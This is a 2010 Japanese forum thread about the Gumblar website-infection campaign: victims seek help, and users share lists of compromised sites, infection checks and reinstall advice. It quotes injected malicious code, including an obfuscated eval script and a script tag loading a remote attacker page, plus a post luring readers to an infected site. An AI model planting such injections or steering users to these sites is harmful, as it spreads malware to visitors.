そういうことするからまた同じバカが出てくるんだろ

583 :名無しさん@お腹いっぱい。:2010/05/10(月) 19:27:43
>>581
>>581
>>581
>>581
>>581
>>581
>>581
>>581
>>581
>>581
>>581

584 :名無しさん@お腹いっぱい。:2010/05/10(月) 19:37:25
>>581
GJ!

585 :名無しさん@お腹いっぱい。:2010/05/10(月) 19:57:32
IDやパスワード抜かれるというけど
ftpだけでなく動画サイトやネット接続のID、パスワードも抜かれるのだろうか


586 :名無しさん@お腹いっぱい。:2010/05/10(月) 20:33:10
誘導されてきました。お話中おそれいります。
サイト持ちです。

このサイトはコンピュータに損害を与える可能性があります

グーグルでこの表示が出たとの知らせをうけて、該当ページから挿入されたスクリプトを除去し、再アップしました。
しかしながら、今後も同様のケースが考えられるので根底から対処しないといけないということです。

ウイルス除去タイプのプロバイダーを使っていたので、今まで安心していました。

今後サイトに変なスクリプトが挿入されないようにするには、どういった対処がおすすめでしょうか。
皆さんの意見をお願いします。※スレチであれば、誘導もお願いします。


587 :名無しさん@お腹いっぱい。:2010/05/10(月) 20:38:10
ホームページさっさと閉鎖してアラスカで隠居してください

588 :名無しさん@お腹いっぱい。:2010/05/10(月) 20:39:12
>>586
ttp://www.ipa.go.jp/security/topics/20091224.html

589 :名無しさん@お腹いっぱい。:2010/05/10(月) 20:48:13
>>586
あなたのPCに何か感染していますので
とっととクリーンインストールしてください。

590 :名無しさん@お腹いっぱい。:2010/05/10(月) 21:05:18
>>585
ネット接続のパス抜かれたら終わりだ・・・
Gumblarで実際にそうなるのかねえ

591 :名無しさん@お腹いっぱい。:2010/05/10(月) 21:12:27
>>585
通信を監視していますので非セキュアな通信はすべて筒抜けです

592 :名無しさん@お腹いっぱい。:2010/05/10(月) 21:15:28
>>586
セキュリティ対策ソフト入れないってのはありえないわ
根底から対処っていうのはOS入れなおせっていう意味だよ

593 :名無しさん@お腹いっぱい。:2010/05/10(月) 21:35:29
>>591
最悪ネット接続すら出来ないのか gkbr

594 :名無しさん@お腹いっぱい。:2010/05/10(月) 21:36:54
>>592とか何の対策にもなってないんだがw

煽るのもいいけど、FTPのパスワードは最低変えておけぐらい言えばいいのに

595 :名無しさん@お腹いっぱい。:2010/05/10(月) 21:43:00
>>591
よく分からんなFWは無力なのか?

596 :名無しさん@お腹いっぱい。:2010/05/10(月) 21:49:40
こっちも。
http://www.ipa.go.jp/security/txt/2010/04outline.html
(3)ウェブサイト改ざんの被害発生時の対処
特に利用者の告知は必須。

ウイルスのチェック方法等をあわせて告知しないと、被害が拡大する↓
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1440009934


597 :名無しさん@お腹いっぱい。:2010/05/10(月) 21:51:25
>>594
感染PCから変えても無駄だろ

598 :名無しさん@お腹いっぱい。:2010/05/10(月) 21:55:13
586です
対処します。ありがとうございました。

599 :名無しさん@お腹いっぱい。:2010/05/10(月) 21:58:08
>>593
ISPからの個人あてメールも削除おすすめ・・・かも

600 :名無しさん@お腹いっぱい。:2010/05/10(月) 22:08:59
>>588>>596を確認せずにホイホイ踏むようなら、救いようがないな

601 :名無しさん@お腹いっぱい。:2010/05/10(月) 22:33:18
gnome「夕張メロン熊かわいいよ夕張メロン熊」

602 :名無しさん@お腹いっぱい。:2010/05/10(月) 22:36:25
Adobe Reader以外のPDFソフトでJavaScript関連の他に気をつける事はあるの?

603 :名無しさん@お腹いっぱい。:2010/05/10(月) 23:06:12
PDF X-Change ViewerにだってJavaScriptはあるぞとだけ


604 :名無しさん@お腹いっぱい。:2010/05/10(月) 23:29:19
Office97や2000で散々マクロウィルス叩かれたけど、
だからといって、一太郎や花子に脆弱性が無いという保障にはならない

605 :名無しさん@お腹いっぱい。:2010/05/10(月) 23:31:59
一太郎とか最近狙われたばっかじゃん

606 :名無しさん@お腹いっぱい。:2010/05/10(月) 23:44:53
ここ2〜3年くらいで急に狙われ出したな>一太郎
あとATOKも

607 :名無しさん@お腹いっぱい。:2010/05/10(月) 23:58:33
【陥落サイトのURL悪用厳禁】
sound●jp/kimitoiumizunonakade/
fourlcp●com

>>576
色々やってみた

上:
ttp://www.virustotal.com/jp/analisis/f942bb71aab5e4fd70839417e7d82d4334bfd7e8350ca1437dfd826ac84b9041-1273501485
下(全部):
ttp://www.virustotal.com/jp/analisis/f40f4aa1ed6196b33132a4d3d8d8c6bcefb160e3fbc5798a6ac7ade730cd6170-1273501248
下(<script></script>のみ):
ttp://www.virustotal.com/jp/analisis/4d73584fc0a3087cc58028a4eeac405f94204f62bb60d12f747e8de13ab5d204-1273502164
swfobject.js:
ttp://www.virustotal.com/jp/analisis/7118a6aa10d05e5d773b6080a83889a5cc9b387701f8d0b1acfd62618a560392-1273485048


「「Gumblar」関連のウイルスがランキング上位に - 「一太郎」狙いのゼロデイ攻撃も」
ttp://www.security-next.com/012526.html

608 :名無しさん@お腹いっぱい。:2010/05/11(火) 00:03:47
>>607
MSE使えねー

609 :名無しさん@お腹いっぱい。:2010/05/11(火) 00:17:32
ところでこのサイトの主にウイルスを駆除させる妙案はないものでしょうか
myako●net

昨日だけで9000人以上が閲覧
早急にどうにかしないとまずいのに何度メール送ってもスルーされる…

610 :名無しさん@お腹いっぱい。:2010/05/11(火) 00:25:15
>>609
確認できないんだが

611 :名無しさん@お腹いっぱい。:2010/05/11(火) 00:39:59
>>609
こちらの環境でも現在は修正及びサブドメインは403にされている模様です。

612 :名無しさん@お腹いっぱい。:2010/05/11(火) 00:43:59
>>611撤回
残ってた>>445 Last-Modified: Sun, 11 Apr 2010 21:36:14 GMT
alienear●ru

613 :名無しさん@お腹いっぱい。:2010/05/11(火) 00:54:14
>>610
aguseじゃでなかったけどgredだとでたぞ

614 :名無しさん@お腹いっぱい。:2010/05/11(火) 01:18:41
>>613
ここの
myako.net/download/down2.cgi
これがやられてるね。
myako.net/download/kensakumdl.js



615 :名無しさん@お腹いっぱい。:2010/05/11(火) 01:23:15
myako.net/java2/amophoto/zidouslide.html
myako.net/juke.html
myako.net/java2/amophoto/photo.html

この辺も


616 :名無しさん@お腹いっぱい。:2010/05/11(火) 01:28:26
myako.net/download/

ここ全部やられてる



617 :名無しさん@お腹いっぱい。:2010/05/11(火) 01:33:17
8080系のサイト改竄って管理人には解んないのかな?
結構出入りの多そうなサイトだし…HP作成のjs配布サイトってw

618 :名無しさん@お腹いっぱい。:2010/05/11(火) 01:35:40
>>614-616
>>1
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***

>>609
myako●net [219●94●128●187] www947●sakura●ne●jp
>>7のさくらにつーほーすますた。

619 :名無しさん@お腹いっぱい。:2010/05/11(火) 01:36:47
>>618
乙です

620 :名無しさん@お腹いっぱい。:2010/05/11(火) 01:38:49
gredはスルーしすぎ

621 :613:2010/05/11(火) 01:52:32
>gredはスルーしすぎ

俺もAVは入れて無いんだけどね


622 :名無しさん@お腹いっぱい。:2010/05/11(火) 01:56:38
朝までに緑になってますように (-人-)
ttp://www.google.com/url?q=http%3A%2F%2Fonline%2Eus.drweb%2Ecom%2Fresult%2F%3Furl%3Dhttp%253A%252F%252Fmyako%252Enet%252Fshop%252Findex%252Ehtml

623 :このV誰のV ◆yUyb3Tqn92 :2010/05/11(火) 04:45:26
(*VдV*)v

477 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:33:22 ID:38FsBWE+0
>>476
法則にそってレアアイテム手に入れる方法あるぞ
http://myako.net

チート嫌いなら別だがね

478 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:34:48 ID:Zp72kWEj0
>>477
裏技でプレイするのは最後の手段だろ

479 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:36:01 ID:ZTLYXdOv0
>>477
そんな法則あったんだな、今2匹目で普通に出ちゃったから別ので詰まったら試してみよう

480 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:37:56 ID:YMFIRoo+0
しっぷう、しっぷう、ラウンドゼロ

これマジでどうすりゃいいの?
たまに当たっても何もできないまま負けるんだけど…

481 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:38:05 ID:Zp72kWEj0
>>479
握手しよう

482 :(VдV) ◆yUyb3Tqn92 :2010/05/11(火) 04:40:33 ID:Zp72kWEj0
Д< クククク、引っかかったな愚かな勇者ども

624 :このV誰のV ◆yUyb3Tqn92 :2010/05/11(火) 04:48:55
(V`д´V)エッヘン

620 :名無しさん@お腹いっぱい。:2010/05/11(火) 03:27:31 ID:HJ28nnYh
>>618
ぱくり乙
http://sound.jp/kimitoiumizunonakade/

自分の意見みたいに言うなよks

621 :名無しさん@お腹いっぱい。:2010/05/11(火) 03:27:47 ID:qRZV9Fiz
>>615
そこ、本当にお前の村かよw
「HOME」付きのSSを晒せよw

622 :名無しさん@お腹いっぱい。:2010/05/11(火) 03:28:48 ID:JReWC+AX
>>620
スペック晒してるから
いつ攻められてもおかしくないだろこれ


625 :名無しさん@お腹いっぱい。:2010/05/11(火) 04:51:18
なんだこの馬鹿は

626 :八頭 ◆YAGApwSaEw :2010/05/11(火) 06:32:48
Google危険警告ページ
hatoyamakoji●com

627 :名無しさん@お腹いっぱい。:2010/05/11(火) 07:53:56
>>626
hatoyamakoji●com [59●106●13●145] www495●sakura●ne●jp
>>7のさくらにつーほーすたー。

628 :名無しさん@お腹いっぱい。:2010/05/11(火) 14:30:34
>>624
これ踏んでしまった。
何かマズいものあります?

629 :名無しさん@お腹いっぱい。:2010/05/11(火) 16:20:15
お前の頭かな

630 :名無しさん@お腹いっぱい。:2010/05/11(火) 16:33:14
>>628
あーあ、やっちゃったね
ご愁傷様

631 :名無しさん@お腹いっぱい。:2010/05/11(火) 16:58:06
もうこれだけ蔓延してると、踏まないなんて無理だな

632 :名無しさん@お腹いっぱい。:2010/05/11(火) 17:02:54
>>630
ガンブラーだったんですか?
OSクリーンインストールしないとマズイんでしょうか?

633 :名無しさん@お腹いっぱい。:2010/05/11(火) 17:16:30
さっさとしろよボケ

634 :名無しさん@お腹いっぱい。:2010/05/11(火) 17:18:45
>>632
>>633さんもこんなに怒ってるんだぞ

635 :名無しさん@お腹いっぱい。:2010/05/11(火) 17:21:29
がんぶらぁって感染したら何するの?
ゴチャゴチャ書いてるの読むのメンドいから説明してよ
>>2とか意味わかんないし既存のセキュリティソフトでは何の意味も無いってこと?

636 :名無しさん@お腹いっぱい。:2010/05/11(火) 17:32:02
感染したら周りに迷惑だから
PCごと捨てちゃえばメンドくなくて簡単だよ!

637 :名無しさん@お腹いっぱい。:2010/05/11(火) 17:32:28
説明を求めてるのにその回答は無いわー
お前アタマ悪いだろ?

638 :名無しさん@お腹いっぱい。:2010/05/11(火) 17:35:29
OSクリーンインストールしたくないです(´;ω;`)
本当に感染してしまったんでしょうか

639 :名無しさん@お腹いっぱい。:2010/05/11(火) 17:35:53
>>637
>>2読んでも理解できなければPC捨てた方がいいじゃない?^^

640 :名無しさん@お腹いっぱい。:2010/05/11(火) 17:38:32
結局説明出来ないのかよw
テンプレ任せでよく分かってない奴が居着いて煽ってるんじゃ話にならんな

641 :名無しさん@お腹いっぱい。:2010/05/11(火) 17:43:53
>>572 >>577を見て思ったのですが
ruドメインとcnドメインのアドレスのサイトが危険な傾向にあるというだけで
そのドメインがアドレスに無いロシアのサイトや中国のサイトが危険というわけではないのですね

642 :名無しさん@お腹いっぱい。:2010/05/11(火) 17:46:11
>>641
日本語で

643 :名無しさん@お腹いっぱい。:2010/05/11(火) 17:53:44
>>642
ロシアのサイトでもruドメインではないサイトがあるけど
そういう場合は危険なのかという話

644 :名無しさん@お腹いっぱい。:2010/05/11(火) 17:55:52
>>643
元のドメインがどこかは関係ない

645 :名無しさん@お腹いっぱい。:2010/05/11(火) 18:07:46
>>638
したくないとかそういう意思の問題じゃないです
とりあえずスキャンしてみればいいじゃない

646 :名無しさん@お腹いっぱい。:2010/05/11(火) 18:27:00
最近思うんだけど
gumblerに感染してしまった場合
感染の確認方法はあるのでしょうか
また最近のgumblerに感染するとどんな症状が出たりするのでしょうか?
もちろん>>2は怠っていません


647 :名無しさん@お腹いっぱい。:2010/05/11(火) 18:28:45
もう無理だって踏まないとかは、
だからテンプレにあることしとけばいい
ゼロデイなんて言っても、実際になにか起こる前にはここが狙われそうだから気をつけようとか前段階で話がされるもんだし、その情報に気を配って設定してればおk

648 :名無しさん@お腹いっぱい。:2010/05/11(火) 18:45:21
マジで返答の半分以上が「PC捨てれば^^」とか「捨てPCで感染すれば分かるんじゃない^^」とか「怖いならクリーンインスコおkおk^^」とかはぐらかしてばかりの奴ばっかりだな……
まぁID出ない上gumblerを自演で意図的にばら撒いてるヘンなのまでいるんだからそういう粘着の類が居てもおかしくは無いのか


649 :名無しさん@お腹いっぱい。:2010/05/11(火) 18:49:11
>>647
マジで昨日まで大丈夫だったサイトが今日見たらGumbler移ってました、ってのが
ありえるからな……
危機管理の無い「自分だけは大丈夫」って思ってるサイト持ちの奴がどんどん広めてて、
ネットサーフィンする以上避けようがない
もうビクビクするならネット見るな、のレベル

650 :名無しさん@お腹いっぱい。:2010/05/11(火) 18:49:39
>>647
>>646はそのPCが感染してるかどうかの確認方法を聞きたいんじゃないか?

651 :名無しさん@お腹いっぱい。:2010/05/11(火) 18:56:02
>>648
信頼できる情報は専門家から金を出して買え

652 :名無しさん@お腹いっぱい。:2010/05/11(火) 19:01:25
仮想デスクトップで最近のGumblar踏んでくれる人柱はいないのか

653 :名無しさん@お腹いっぱい。:2010/05/11(火) 19:02:59
>>650
あ、いや別に>>646にレスしたわけじゃない
しかも>>647はほとんど願望、素人のこうであってくれと言う嘆きでしかない

654 :名無しさん@お腹いっぱい。:2010/05/11(火) 19:09:29
>>652
言い出しっぺの法則

655 :名無しさん@お腹いっぱい。:2010/05/11(火) 19:46:43
>>646
確認方法はスキャンしてみるって程度
様々なマルウェアをDLするのでそのどれかがスキャンにひっかかるはずという理由

FTP設定ファイルの検索、通信の盗聴、一時期は特定サイトへの攻撃などあったけど
目に見えてわかりやすい症状がでるかというとたぶんない
偽セキュリティソフトのインストールも確実にされるかはわからんしなあ

656 :名無しさん@お腹いっぱい。:2010/05/11(火) 19:48:26
>>648
何がわからないのかいってくれないと回答しようがないじゃない
質問の大半が「感染したのでしょうか?」なんだから
心配ならOS入れなおせとしか言えないよ

657 :名無しさん@お腹いっぱい。:2010/05/11(火) 19:51:23
>>655
以前はPC動作が重い、chmファイル改ざんと分かりやすかったのになあ

658 :名無しさん@お腹いっぱい。:2010/05/11(火) 19:57:05
【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)

削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索

C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除


この確認方法も今は通用しないのか

659 :名無しさん@お腹いっぱい。:2010/05/11(火) 20:04:01
常識的に考えると
HKLMとHKCUの\SOFTWARE\Microsoft\Windows\CurrentVersion\Run辺りで
常駐させてると思うからそこになければ平気な気がするけど
無ければ絶対問題無いといい切れないのが、進化し続けるウィルス

660 :名無しさん@お腹いっぱい。:2010/05/11(火) 20:19:26
>>646
gumblerに感染したかの確認って言ってるけどgumblerで入ってくるマルウェアは一種類じゃないし
改竄されたサイトに>>2を怠って接続したりしたら勝手にマルウェアをダウンロードされてインストール
されるってこと
入ってくるマルウェアがダウンローダー系だったら色んなワームやら偽セキュリティーソフトがダウンロードされるわけだし
ウイルス対策ソフト入れてたって検出されないやつだったらそのまま入ってきてインストールされるしね
確認方法なんて走ってる怪しいProcessの確認とか、レジストリーのrunキーの確認とか今までの既存のウイルスの感染確認しかない
アンチウイルスソフト最新にして>>2をやる以外に対策はない
ネット使ってて絶対に感染しない対策なんてそもそもないし
それでも不安ならRITURNILでも使ってサイト閲覧は全部仮想化してやるとか
ユーザーの了解なく勝手にダウンロードされてインストールされるのがgumblerの怖いところだよねぇ




661 :名無しさん@お腹いっぱい。:2010/05/11(火) 20:20:59
>>657
重くなるのはスペック次第じゃないかな
今も低スペックなら重くなるかもしれない

>>658
ファイル名なんてすぐ変更できるから意味がないよね

>>659
初期Gumblarはドライバ部分じゃなかったっけ?

662 :名無しさん@お腹いっぱい。:2010/05/11(火) 20:24:10
UACとか保護モードも通じない?からなあ
QuickTime無しでmp4やmov形式見られる他のプレイヤーもほとんど無いし

663 :名無しさん@お腹いっぱい。:2010/05/11(火) 20:44:51
QuickTimeプレイヤーなんか使ってる奴いるのか?
alternativeでコーデックだけインストールしてブラウザのプラグインはインストールしないというやり方のほうが
いいと思うのだが

664 :名無しさん@お腹いっぱい。:2010/05/11(火) 20:57:56
だいたいQuickTimeは攻撃に使われてないだろ

665 :名無しさん@お腹いっぱい。:2010/05/11(火) 21:00:11
>>663
つかってなくてもアップルさんが入れろっていうから…

666 :名無しさん@お腹いっぱい。:2010/05/11(火) 21:04:46
>>663
Alternativeのコーデックは他の一部プレイヤーで不都合ありだからなあ

ttp://www.katch.ne.jp/~kakonacl/douga/winplayer/winplayer2.html

667 :名無しさん@お腹いっぱい。:2010/05/11(火) 21:20:36
ブラウザにプラグイン的に拡張されるのは全部脆弱性あるとまずいね
Quicktimeは現時点で攻撃目標にされてないだけで、
今後何があるかわからん

668 :名無しさん@お腹いっぱい。:2010/05/11(火) 21:23:13
そんなおびえる必要なんてねえだろ
病気かよ

669 :名無しさん@お腹いっぱい。:2010/05/11(火) 22:24:26
Quicktimeは色々行儀悪いから入れないのが普通
movファイルとかまず使わんしmp4はffdshowでも入れておけばいいし

670 :名無しさん@お腹いっぱい。:2010/05/11(火) 22:27:25
普通とか何様だよ
必要な人もいるんだろ

671 :名無しさん@お腹いっぱい。:2010/05/11(火) 22:29:52
ガンブラーについてもよく分かってないくせに
偉そうに語るやつが多いな

672 :名無しさん@お腹いっぱい。:2010/05/11(火) 22:34:24
>>668
>>670
>>671

673 :名無しさん@お腹いっぱい。:2010/05/11(火) 22:41:03
ちなみにお前のことな

674 :名無しさん@お腹いっぱい。:2010/05/11(火) 22:44:16
ちなみにお前のことな

675 :名無しさん@お腹いっぱい。:2010/05/11(火) 22:44:48
でた
馬鹿得意のコピペ

676 :名無しさん@お腹いっぱい。:2010/05/11(火) 22:48:27
低脳は自分の馬鹿はわからないのかorz

677 :名無しさん@お腹いっぱい。:2010/05/11(火) 22:57:41
くだらね

678 :名無しさん@お腹いっぱい。:2010/05/11(火) 22:59:40
必要なら使えばいいだろってことだろ
攻撃にも使われてないのに使うななんていうのはありえねえ
そんこと言ったら何も使えん

679 :名無しさん@お腹いっぱい。:2010/05/11(火) 23:03:23
>>678
いちゃもんつけて
スレの流れ切ってんのはお前だろすっこんでろw

680 :名無しさん@お腹いっぱい。:2010/05/11(火) 23:46:35
俺には何人で会話してるのかさえ分からん……
無知でサーセン

681 :コテハン ◆8080adndqg :2010/05/12(水) 01:15:42
>>662-669
VLC Media Playerはどないだ?
再生可能なやつ↓
MPEG、AVI、ASF、WMV、WMA、MP4、MOV、3GP、OGG、OGM、Annodex、MKV
WAV、DTS、AAC(m4a)、AC3、A52、Raw DV、FLAC、FLV、MIDI、SMF、MXF・・・

682 :名無しさん@お腹いっぱい。:2010/05/12(水) 01:33:41
>>682
MediaPrayerClassicも仲間に入れてあげてください

683 :名無しさん@お腹いっぱい。:2010/05/12(水) 01:41:49
また間違えたorz

684 :名無しさん@お腹いっぱい。:2010/05/12(水) 02:06:12
>>681
> VLC Media Playerはどないだ?

VLCの現行配布バイナリは 0-day 持ち。
Fix済みソースはリリースされてんのに、
なかなかバイナリがでない。

685 :名無しさん@お腹いっぱい。:2010/05/12(水) 02:12:06
>>684
現行バイナリは1.0.5。fix済みは1.0.6


686 :名無しさん@お腹いっぱい。:2010/05/12(水) 02:12:48
VLC.は1.0.6待ち

687 :名無しさん@お腹いっぱい。:2010/05/12(水) 04:46:29
myako●net
>サーバのファイルにスパイウェアを仕掛けられたため

えぇー

688 :名無しさん@お腹いっぱい。:2010/05/12(水) 05:30:09
メルに>>8送ったんですけどねぇ。。。

689 :名無しさん@お腹いっぱい。:2010/05/12(水) 10:30:48
VLCがゼロデイ持ちって言ったって、ちょっと検索したけどいつも見てるホームページが改竄されるGumblerほどの脅威は無いんじゃないの?
自分でダウンロードした覚えのないモノ迂闊に開かない限り問題無いと思うんだけどねぇ
そんなホイホイ不審なファイル開くのって山田オルタナにも感染しそうだ

690 :名無しさん@お腹いっぱい。:2010/05/12(水) 12:21:33
VLCのフォントってどうやれば変えられるんだ?

691 :名無しさん@お腹いっぱい。:2010/05/12(水) 12:28:32
VLCは何度設定変更しても元に戻るからもう諦めてデフォで使ってる

692 :名無しさん@お腹いっぱい。:2010/05/12(水) 13:16:18
>>681
俺はSM PLAYERも仲間に入れてね


693 :名無しさん@お腹いっぱい。:2010/05/12(水) 13:53:28
僕がつこうてる動画プレーヤーの話は余所でやれ

694 :名無しさん@お腹いっぱい。:2010/05/12(水) 17:02:33
>>687
これひどいな
サイト主のやる気とか関係なく、後始末ぐらいはちゃんとしろよ
>>607の一番上も403にしただけだし、、、
まあこの後ちゃんと対策含めた告知出すのかもしれんが

695 :名無しさん@お腹いっぱい。:2010/05/12(水) 18:55:06
むしろちゃんと利用者に対して説明したサイトってなくね
JRとか競馬場のとこですら「てめーらで勝手にウィルススキャンして対処して下さいね」としか言ってないし

696 :コテハン ◆8080adndqg :2010/05/12(水) 19:59:24
【陥落サイトのURL悪用厳禁】
www●fukuyama-flowerlc●com/
pinkhost●web●fc2●com/i/more06/

ところで、myako●netは再開するつもりなのかにゃ?

697 :名無しさん@お腹いっぱい。:2010/05/12(水) 20:21:26
Shockwave Playerも危険性あり?

698 :名無しさん@お腹いっぱい。:2010/05/12(水) 21:00:44
myako●net
再開してるね。

>スパイウェアで攻撃されたため全削除しました(><)
>初心者に優しいスクリプトを再度どのくらいまでできるかわかりませんが配布します
>順次再構築していきますので時々覗いてみて下さい

またやられそう

699 :名無しさん@お腹いっぱい。:2010/05/12(水) 21:39:47
>>697
現時点でGumblarで利用されていないが
今日重大な脆弱性の修正バージョンがリリースされているので
入れてるなら更新した方がいいし、入れてるだけで使ってないなら削除した方がいい

700 :名無しさん@お腹いっぱい。:2010/05/12(水) 21:54:37
www●kaizenya●net/newevent ←2月から感染したまま
infom●biz/secretdiet

701 :名無しさん@お腹いっぱい。:2010/05/12(水) 22:20:27
とあるウェブサイトより

<script language=javascript><!-- Yahoo! Counter starts here-->if(typeof(yahoo_counter)!=typeof(1))eval(unescape(' <--省略--> );var yahoo_counter=1;<!-- counter end --></script><!-- counter end--></script>

上記部分だけ抜き出して投げてみた
http://www.virustotal.com/jp/analisis/7b35db5445fbcbf92d47775897ed438c22184c7b8b502196ff7dc18e7e9e82ae-1273664704

702 :名無しさん@お腹いっぱい。:2010/05/13(木) 02:44:34
>>586です。
あれからウイルス駆除ソフトでチェックをして、見つかったものを削除。

あわせて、>>658をみて、siszyd32.exeとTMD.tmpがないことを確かめました。

FTPはレンタルサーバーのものを使っているのでパスはありません。

一応これで安心でしょうか? >>2も対処しました。ご教授お願いします。

703 :名無しさん@お腹いっぱい。:2010/05/13(木) 03:10:45
www.hipparidako.net/index.html


704 :名無しさん@お腹いっぱい。:2010/05/13(木) 03:20:47
>>702
スキャンはあくまで目安であり完全に除去できるものではありません
OSの入れなおしをしてください
また同一ネットワーク上にPCがあるならそちらもスキャンしてください

レンタルサーバでもFTPならパスがあるはずだけどそのへんはわかりません

ちなみに以下は意味がないです
> あわせて、>>658をみて、siszyd32.exeとTMD.tmpがないことを確かめました。

705 :名無しさん@お腹いっぱい。:2010/05/13(木) 07:22:15
>>703
rollover.jsにスクリプトを確認
欠けているのでおそらく不発ですが、放置するのもまずいですね…

706 :名無しさん@お腹いっぱい。:2010/05/13(木) 08:33:19
>>702
パスがないって…anonymousなの?

707 :名無しさん@お腹いっぱい。:2010/05/13(木) 08:52:38
コンパネ使ってるとかなんじゃないの

708 :名無しさん@お腹いっぱい。:2010/05/13(木) 09:03:39
>>702
マルウェア専用のダウンローダーが入ってればそんな事しても意味無い

>FTPはレンタルサーバーのものを使っているのでパスはありません。
意味がわかりません

709 :コテハン ◆8080adndqg :2010/05/13(木) 10:58:53
>>702
■感染パソコンの修復は「OSの再インストール」が近道
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=2166

スキャナー走らせまくって「不確実な駆除作業」に時間をかけるより
クリーンインストールのほうが早くて確実なのです。


710 :名無しさん@お腹いっぱい。:2010/05/13(木) 12:00:37
>>702
>>2は感染する前にやらないと無意味

711 :名無しさん@お腹いっぱい。:2010/05/13(木) 12:12:07
>>702です
みなさん、ありがとうございます。
ウイルス駆除ソフトで、検知されなかったのでもう大丈夫だと思っていました。

OSの再インストールというのをやったことがないので不安ですが、リカバリディスクは
PCを購入した時に
解説書にあるとおりに「工場出荷時のイメージ」として作ったCDのことだと思いますので、
それで復元できると思います。
やってみます。

712 :名無しさん@お腹いっぱい。:2010/05/13(木) 12:50:07
リカバリディスクで復元出来ない物は無いだろ
出来ないとしたらPCが物理的に壊れてる

713 :名無しさん@お腹いっぱい。:2010/05/13(木) 13:02:10
>>711
以下の鶴で検査して異常がなければ無問題だよ。
リカバリする前に試してみ。

オンラインウイルススキャン
http://www.kaspersky.co.jp/virusscanner
ウイルス駆除ツール
http://support.kaspersky.co.jp/viruses/utility
KatesKiller
http://support.kaspersky.co.jp/viruses/solutions?qid=208283462

714 :コテハン ◆8080adndqg :2010/05/13(木) 13:28:52
>>702
サイトに突っ込まれたのはどのタイプかにゃ?
1:<script src=http://〜中略〜.php ></script>
2:<script>〜難読化されたコード〜</script><!--英数字の羅列(32文字)-->
3:1・2以外のコード
4:よくわかんない


715 :名無しさん@お腹いっぱい:2010/05/13(木) 13:42:44
>713
ありがとうございます。やってみます。

>714
1だと思います。
短めのもので、一ページに一行だけ挿入されていました。
ページの削除→再アップロードで消えました。

716 :名無しさん@お腹いっぱい。:2010/05/13(木) 13:46:09
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2010/05.html#20100513_Shockwave
Shockwaveなんて今時使わないだろ
やっぱり要らないプラグイン入ってる奴はアンインストールしとけ

717 :名無しさん@お腹いっぱい:2010/05/13(木) 13:57:09
>>702
>>714
頻出してすいません。さがしてきました。これです。
<script src=http://science.webphoto.ir/photos/Advertise.php
></script>

718 :名無しさん@お腹いっぱい。:2010/05/13(木) 14:07:08
>>717
>>1
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***

http://www.google.com/safebrowsing/diagnostic?site=%73%63%69%65%6e%63%65%2e%77%65%62%70%68%6f%74%6f%2e%69%72
http://safeweb.norton.com/report/show?url=%77%65%62%70%68%6f%74%6f%2e%69%72
http://www.siteadvisor.com/sites/%77%65%62%70%68%6f%74%6f%2e%69%72

719 :名無しさん@お腹いっぱい。:2010/05/13(木) 14:25:29
aguseで調べると「同一サーバ上の他のウェブサイト」という項目があるけど
その調べたサイトが安全でも「同一サーバ上の他のウェブサイト」がひとつでも感染してると
調べたサイトも危険ということになるのか?

720 :コテハン ◆8080adndqg :2010/05/13(木) 14:40:16
>>717
そりはGumblar(Gumblar.x)だぬ。
>>713でもおkだけど、他の物も入り込んでる可能性が高いから、
リカバリ後に>>2を実行を推奨するのです。


721 :名無しさん@お腹いっぱい。:2010/05/13(木) 14:41:11
>>719
日本語でおk

722 :名無しさん@お腹いっぱい。:2010/05/13(木) 15:01:50
>>717
試しに踏んでみたけど何の反応もない。

723 :名無しさん@お腹いっぱい:2010/05/13(木) 16:09:12
>717
spybot,ccc,>>713の方法で二回スキャンをかけました。
結果はゼロでウイルスは見つかりませんでしたが
念のためにリカバリしようと思います。

詳しい方が多いようなのでもう一つだけお願いします。
windows7を使っています。
outlookのメールをファイルに保存して、ファイルを外部CDへコピーし、
リカバリの後に戻そうと思っています。

その方法がOEと違っていて、参考になるサイトが見つかりません。
(Xp→7の方法や、OEのファイル保存方法がひっかかります)

windows liveで同期をとろうとしましたが、こちらも再インストールしても、うまくいきませんでした。

スレチなのでお叱り承知ですが、win7のメールの再生方法について、ご教授お願いいたします。
あと>>722さん踏ませてしまってごめんなさい。以後気をつけます。

724 :名無しさん@お腹いっぱい。:2010/05/13(木) 16:14:20
ここはそういうスレちゃうねんで

725 :名無しさん@お腹いっぱい。:2010/05/13(木) 16:16:12
http://support.microsoft.com/kb/932821/ja
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=8b081f3a-b7d0-4b16-b8af-5a6322f4fd01
http://www.atmarkit.co.jp/fwin2k/win2ktips/405pstbkup/pstbkup.html

726 :名無しさん@お腹いっぱい。:2010/05/13(木) 16:16:25
>>723
> windows7を使っています。

なら感染してないよ、たぶん。

727 :名無しさん@お腹いっぱい。:2010/05/13(木) 16:27:30
取扱注意

www●caaac●net
www●ykhsk●net
www●delldell●info
www●nkrc●co●jp
www●nihontouya●com

728 :名無しさん@お腹いっぱい。:2010/05/13(木) 17:55:03
https://www.aguse.jp/download.php
>バージョンアップ内容
> * (2010/05/13) 右クリックメニューからaguse / aguse Gatewayを利用するツールを公開しました。(Firefox3, IE8)

729 :コテハン ◆8080adndqg :2010/05/13(木) 18:05:21
>>727
〜\x2e\x70\x68\x70" 復活してたのねorz

【陥落サイトのURL悪用厳禁】
www●uranaiyakata●com/
lecoqsportif-jp●com/
www●tec●ne●jp/

ja-jp●facebook●com/ ←ぁ?

730 :名無しさん@お腹いっぱい。:2010/05/13(木) 18:05:29
ru、cn、infoときて今度はどうなることやら
先進国はやられてほしくないものだが

